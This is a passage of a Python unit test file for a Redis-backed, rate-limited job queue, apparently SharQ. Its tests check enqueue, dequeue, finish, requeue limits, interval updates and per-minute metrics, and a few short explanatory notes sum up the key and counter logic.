queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# wait for the job expiry interval; the time keeper
# key should have expired by then.
time.sleep(self.queue._job_expire_interval / 1000.00) # in seconds
time_keeper_key_name = '%s:%s:%s:time' % (
self.queue._key_prefix,
self._test_queue_type, self._test_queue_id
)
self.assertFalse(self.queue._r.exists(time_keeper_key_name))
def test_dequeue_ready_queue_type_set(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# the ready queue type set should have 0 items
queue_type_ready_set = self.queue._r.smembers(
'%s:ready:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_ready_set), 0)
def test_dequeue_active_queue_type_set(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# the active queue type set should have one item
queue_type_active_set = self.queue._r.smembers(
'%s:active:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_active_set), 1)
self.assertEqual(queue_type_active_set.pop(), self._test_queue_type)
def test_dequeue_metrics_global_dequeue_counter(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
timestamp = int(generate_epoch())
# epoch for the minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
counter_value = self.queue._r.get('%s:dequeue_counter:%s' % (
self.queue._key_prefix, timestamp_minute))
self.assertEqual(counter_value, '1')
def test_dequeue_metrics_per_queue_dequeue_counter(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
timestamp = int(generate_epoch())
# epoch for the minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
counter_value = self.queue._r.get('%s:%s:%s:dequeue_counter:%s' % (
self.queue._key_prefix,
self._test_queue_type,
self._test_queue_id,
timestamp_minute))
self.assertEqual(counter_value, '1')
def test_finish_on_empty_queue(self):
job_id = self._get_job_id()
response = self.queue.finish(
job_id=job_id,
queue_id='doesnotexist',
queue_type=self._test_queue_type
)
self.assertEqual(response['status'], 'failure')
def test_finish_response_status(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
self.assertEqual(response['status'], 'success')
def test_finish_ready_sorted_set_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
self.assertFalse(
self.queue._r.exists('%s:%s' % (
self.queue._key_prefix, self._test_queue_type)))
def test_finish_active_sorted_set_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
self.assertFalse(
self.queue._r.exists('%s:%s:active' % (
self.queue._key_prefix, self._test_queue_type)))
def test_finish_payload_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
self.assertFalse(
self.queue._r.exists('%s:payload' % self.queue._key_prefix))
def test_finish_interval_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
self.assertFalse(
self.queue._r.exists('%s:interval' % self.queue._key_prefix))
def test_finish_requeue_limit_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
requeue_limit=self._test_requeue_limit_0
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# mark the job as finished
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
self.assertFalse(
self.queue._r.exists('%s:%s:%s:requeues_remaining' % (
self.queue._key_prefix, self._test_queue_type, self._test_queue_id
))
)
def test_finish_job_queue_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
self.assertFalse(
self.queue._r.exists('%s:%s:%s' % (
self.queue._key_prefix, self._test_queue_type, self._test_queue_id)))
def test_finish_time_keeper_expire(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
# wait for the job expiry interval (converted to seconds).
time.sleep(self.queue._job_expire_interval / 1000.00)
time_keeper_key_name = '%s:%s:%s:time' % (
self.queue._key_prefix,
self._test_queue_type, self._test_queue_id)
self.assertFalse(self.queue._r.exists(time_keeper_key_name))
def test_finish_queue_type_ready_set_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
queue_type_ready_set = self.queue._r.smembers(
'%s:ready:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_ready_set), 0)
def test_finish_queue_type_active_set_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
queue_type_active_set = self.queue._r.smembers(
'%s:active:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_active_set), 0)
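Taken together, the `finish` tests above assert that finishing the only job in a queue leaves no trace of it in Redis. The keys they check can be summarized in one place (a sketch; the helper name is illustrative, the key formats come from the assertions themselves):

```python
def keys_checked_after_finish(prefix, queue_type, queue_id):
    # Keys the finish() tests expect to be gone once the only job
    # in the queue has been marked as finished.
    return [
        '%s:%s' % (prefix, queue_type),               # ready sorted set
        '%s:%s:active' % (prefix, queue_type),        # active sorted set
        '%s:payload' % prefix,                        # payload hash
        '%s:interval' % prefix,                       # interval hash
        '%s:%s:%s' % (prefix, queue_type, queue_id),  # per-queue job list
    ]

print(len(keys_checked_after_finish('sharq', 'sms', 'queue1')))  # -> 5
```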
def test_requeue_active_sorted_set(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
self.assertFalse(
self.queue._r.exists('%s:%s:active' % (
self.queue._key_prefix, self._test_queue_type)))
def test_requeue_queue_type_ready_set(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
queue_type_ready_set = self.queue._r.smembers(
'%s:ready:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_ready_set), 1)
self.assertEqual(queue_type_ready_set.pop(), self._test_queue_type)
def test_requeue_queue_type_active_set(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
queue_type_active_set = self.queue._r.smembers(
'%s:active:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_active_set), 0)
def test_requeue_requeue_limit_5(self):
# with requeue limit as 5
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
requeue_limit=self._test_requeue_limit_5
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_5)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_5 - 1)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_5 - 2)
def test_requeue_requeue_limit_0(self):
# with requeue limit as 0
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
requeue_limit=self._test_requeue_limit_0
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_0)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(response['status'], 'failure')
def test_requeue_requeue_limit_neg_1(self):
# with requeue limit as -1 (requeue infinitely)
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
requeue_limit=self._test_requeue_limit_neg_1
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_neg_1)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_neg_1)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_neg_1)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_neg_1)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_neg_1)
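The three requeue-limit tests above exercise one rule: a limit of -1 never decrements (requeue forever), otherwise each requeue consumes one attempt, and once attempts run out the job can no longer be dequeued. A sketch of that bookkeeping (the helper is illustrative; `None` here stands in for the `'failure'` dequeue response):

```python
def requeues_remaining_after(limit, requeues):
    # Remaining requeues after `requeues` expirations, given the
    # limit passed at enqueue time. -1 means requeue infinitely.
    if limit == -1:
        return -1
    remaining = limit - requeues
    return remaining if remaining >= 0 else None

print(requeues_remaining_after(5, 2))    # -> 3
print(requeues_remaining_after(0, 1))    # -> None (dequeue fails)
print(requeues_remaining_after(-1, 99))  # -> -1
```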
def test_interval_non_existent_queue(self):
response = self.queue.interval(
interval=1000,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type
)
self.assertEqual(response['status'], 'failure')
interval_map_name = '%s:interval' % (self.queue._key_prefix)
# check if interval map exists
self.assertFalse(self.queue._r.exists(interval_map_name))
def test_interval_existent_queue(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# check if interval is saved in the appropriate structure
interval_map_name = '%s:interval' % (self.queue._key_prefix)
# check if interval map exists
self.assertTrue(self.queue._r.exists(interval_map_name))
# check the value
interval_map_key = '%s:%s' % (
self._test_queue_type, self._test_queue_id)
interval = self.queue._r.hget(interval_map_name, interval_map_key)
self.assertEqual(interval, '10000')
# set the interval to 5s (5000ms)
response = self.queue.interval(
interval=5000,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type
)
self.assertEqual(response['status'], 'success')
# check if interval is saved in the appropriate structure
interval_map_name = '%s:interval' % (self.queue._key_prefix)
# check if interval map exists
self.assertTrue(self.queue._r.exists(interval_map_name))
# check the value
interval_map_key = '%s:%s' % (
self._test_queue_type, self._test_queue_id)
interval = self.queue._r.hget(interval_map_name, interval_map_key)
self.assertEqual(interval, '5000')
def test_metrics_response_status(self):
response = self.queue.metrics()
self.assertEqual(response['status'], 'success')
response = self.queue.metrics(self._test_queue_type)
self.assertEqual(response['status'], 'success')
response = self.queue.metrics(
self._test_queue_type, self._test_queue_id)
self.assertEqual(response['status'], 'success')
def test_metrics_response_queue_types(self):
response = self.queue.metrics()
self.assertEqual(response['queue_types'], [])
self.assertEqual(len(response['enqueue_counts'].values()), 10)
self.assertEqual(sum(response['enqueue_counts'].values()), 0)
self.assertEqual(len(response['dequeue_counts'].values()), 10)
self.assertEqual(sum(response['dequeue_counts'].values()), 0)
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.metrics()
self.assertEqual(response['queue_types'], [self._test_queue_type])
self.assertEqual(len(response['enqueue_counts'].values()), 10)
self.assertEqual(sum(response['enqueue_counts'].values()), 1)
self.assertEqual(len(response['dequeue_counts'].values()), 10)
self.assertEqual(sum(response['dequeue_counts'].values()), 0)
response = self.queue.dequeue(queue_type=self._test_queue_type)
response = self.queue.metrics()
self.assertEqual(len(response['dequeue_counts'].values()), 10)
self.assertEqual(sum(response['dequeue_counts'].values()), 1)
def test_metrics_response_queue_ids(self):
response = self.queue.metrics(queue_type=self._test_queue_type)
self.assertEqual(response['queue_ids'], [])
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.metrics(queue_type=self._test_queue_type)
self.assertEqual(response['queue_ids'], [self._test_queue_id])
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.metrics(queue_type=self._test_queue_type)
self.assertEqual(response['queue_ids'], [self._test_queue_id])
def test_metrics_response_enqueue_counts_list(self):
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(len(response['enqueue_counts'].values()), 10)
self.assertEqual(sum(response['enqueue_counts'].values()), 0)
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(len(response['enqueue_counts'].values()), 10)
self.assertEqual(sum(response['enqueue_counts'].values()), 1)
def test_metrics_response_dequeue_counts_list(self):
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(len(response['dequeue_counts'].values()), 10)
self.assertEqual(sum(response['dequeue_counts'].values()), 0)
response = self.queue.dequeue(queue_type=self._test_queue_type)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(len(response['dequeue_counts'].values()), 10)
self.assertEqual(sum(response['dequeue_counts'].values()), 0)
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.dequeue(queue_type=self._test_queue_type)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(len(response['dequeue_counts'].values()), 10)
self.assertEqual(sum(response['dequeue_counts'].values()), 1)
def test_metrics_response_queue_length(self):
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(response['queue_length'], 0)
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(response['queue_length'], 1)
response = self.queue.dequeue(queue_type=self._test_queue_type)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(response['queue_length'], 0)
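Every metrics response in these tests carries exactly 10 per-minute count buckets. The bucket boundaries can be sketched as follows (an assumption drawn from the assertions above: the window is the 10 most recent minute starts, in milliseconds):

```python
import math

def metric_buckets(now_ms, n=10):
    # Minute-start epochs for the n most recent buckets,
    # newest first.
    start = int(math.floor(now_ms / 60000.0) * 60000)
    return [start - i * 60000 for i in range(n)]

buckets = metric_buckets(600000)
print(len(buckets))  # -> 10
print(buckets[0])    # -> 600000
print(buckets[-1])   # -> 60000
```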
def test_metrics_enqueue_sliding_window(self):
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(len(response['enqueue_counts'].values()), 10)
self.assertEqual(sum(response['enqueue_counts'].values()), 0)
self.assertEqual(len(global_response['enqueue_counts'].values()), 10)
self.assertEqual(sum(global_response['enqueue_counts'].values()), 0)
# enqueue a job
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
timestamp = int(generate_epoch())
# truncate the epoch (ms) to the start of the current minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
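# e.g. if generate_epoch() returned 1609459265123 (a hypothetical ms value),
# math.floor(1609459265123 / 60000.0) * 60000 == 1609459260000, so the
# bucket key is '1609459260000': the epoch (ms) of the containing minute.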
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['enqueue_counts'][timestamp_minute], 1)
self.assertEqual(
global_response['enqueue_counts'][timestamp_minute], 1)
# enqueue another job
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['enqueue_counts'][timestamp_minute], 2)
self.assertEqual(
global_response['enqueue_counts'][timestamp_minute], 2)
# wait for the next minute bucket (a little over one minute)
time.sleep(65) # 65 seconds
# check the last minute value.
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['enqueue_counts'][timestamp_minute], 2)
self.assertEqual(
global_response['enqueue_counts'][timestamp_minute], 2)
# save the old value before overwriting
old_1_timestamp_minute = timestamp_minute
# check the current minute value
timestamp = int(generate_epoch())
# truncate the epoch (ms) to the start of the current minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['enqueue_counts'][timestamp_minute], 0)
self.assertEqual(
global_response['enqueue_counts'][timestamp_minute], 0)
# enqueue a job in the current minute
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['enqueue_counts'][timestamp_minute], 1)
self.assertEqual(response['enqueue_counts'][old_1_timestamp_minute], 2)
self.assertEqual(
global_response['enqueue_counts'][timestamp_minute], 1)
self.assertEqual(
global_response['enqueue_counts'][old_1_timestamp_minute], 2)
time.sleep(65) # sleep for another 65s
# save the old timestamp
old_2_timestamp_minute = timestamp_minute
# check the current minute value
timestamp = int(generate_epoch())
# truncate the epoch (ms) to the start of the current minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['enqueue_counts'][timestamp_minute], 0)
self.assertEqual(
global_response['enqueue_counts'][timestamp_minute], 0)
# enqueue a job in the current minute
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['enqueue_counts'][timestamp_minute], 1)
self.assertEqual(response['enqueue_counts'][old_1_timestamp_minute], 2)
self.assertEqual(response['enqueue_counts'][old_2_timestamp_minute], 1)
self.assertEqual(
global_response['enqueue_counts'][timestamp_minute], 1)
self.assertEqual(
global_response['enqueue_counts'][old_1_timestamp_minute], 2)
self.assertEqual(
global_response['enqueue_counts'][old_2_timestamp_minute], 1)
def test_metrics_dequeue_sliding_window(self):
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(len(response['dequeue_counts'].values()), 10)
self.assertEqual(sum(response['dequeue_counts'].values()), 0)
self.assertEqual(len(global_response['dequeue_counts'].values()), 10)
self.assertEqual(sum(global_response['dequeue_counts'].values()), 0)
# enqueue a job
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=100, # 100ms
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
timestamp = int(generate_epoch())
# truncate the epoch (ms) to the start of the current minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['dequeue_counts'][timestamp_minute], 1)
self.assertEqual(
global_response['dequeue_counts'][timestamp_minute], 1)
# enqueue another job
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=100, # 100ms
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
time.sleep(0.1) # 100ms
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['dequeue_counts'][timestamp_minute], 2)
self.assertEqual(
global_response['dequeue_counts'][timestamp_minute], 2)
# wait for the next minute bucket (a little over one minute)
time.sleep(65) # 65 seconds
# check the last minute value.
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['dequeue_counts'][timestamp_minute], 2)
self.assertEqual(
global_response['dequeue_counts'][timestamp_minute], 2)
# save the old value before overwriting
old_1_timestamp_minute = timestamp_minute
# check the current minute value
timestamp = int(generate_epoch())
# truncate the epoch (ms) to the start of the current minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['dequeue_counts'][timestamp_minute], 0)
self.assertEqual(
global_response['dequeue_counts'][timestamp_minute], 0)
# enqueue a job in the current minute
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=100, # 100ms
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
time.sleep(0.1) # 100ms
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['dequeue_counts'][timestamp_minute], 1)
self.assertEqual(response['dequeue_counts'][old_1_timestamp_minute], 2)
self.assertEqual(
global_response['dequeue_counts'][timestamp_minute], 1)
self.assertEqual(
global_response['dequeue_counts'][old_1_timestamp_minute], 2)
time.sleep(65) # sleep for another 65s
# save the old timestamp
old_2_timestamp_minute = timestamp_minute
# check the current minute value
timestamp = int(generate_epoch())
# truncate the epoch (ms) to the start of the current minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['dequeue_counts'][timestamp_minute], 0)
self.assertEqual(
global_response['dequeue_counts'][timestamp_minute], 0)
# enqueue a job in the current minute
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=100, # 100ms
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
time.sleep(0.1) # 100ms
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['dequeue_counts'][timestamp_minute], 1)
self.assertEqual(response['dequeue_counts'][old_1_timestamp_minute], 2)
self.assertEqual(response['dequeue_counts'][old_2_timestamp_minute], 1)
self.assertEqual(
global_response['dequeue_counts'][timestamp_minute], 1)
self.assertEqual(
global_response['dequeue_counts'][old_1_timestamp_minute], 2)
self.assertEqual(
global_response['dequeue_counts'][old_2_timestamp_minute], 1)
def test_sharq_rate_limiting(self):
job_id_1 = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=2000, # 2s (2000ms)
job_id=job_id_1,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type
)
job_id_2 = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=2000, # 2s (2000ms)
job_id=job_id_2,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type
)
# Try back-to-back dequeues.
# Only the first should return the job; the second should fail,
# and a dequeue should succeed again only after the specified
# interval has elapsed.
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# check all the responses
self.assertEqual(response['status'], 'success')
self.assertEqual(response['queue_id'], self._test_queue_id)
self.assertEqual(response['job_id'], job_id_1)
self.assertEqual(response['payload'], self._test_payload_1)
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(response['status'], 'failure')
time.sleep(2) # 2s
# dequeue again
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# check all the responses
self.assertEqual(response['status'], 'success')
self.assertEqual(response['queue_id'], self._test_queue_id)
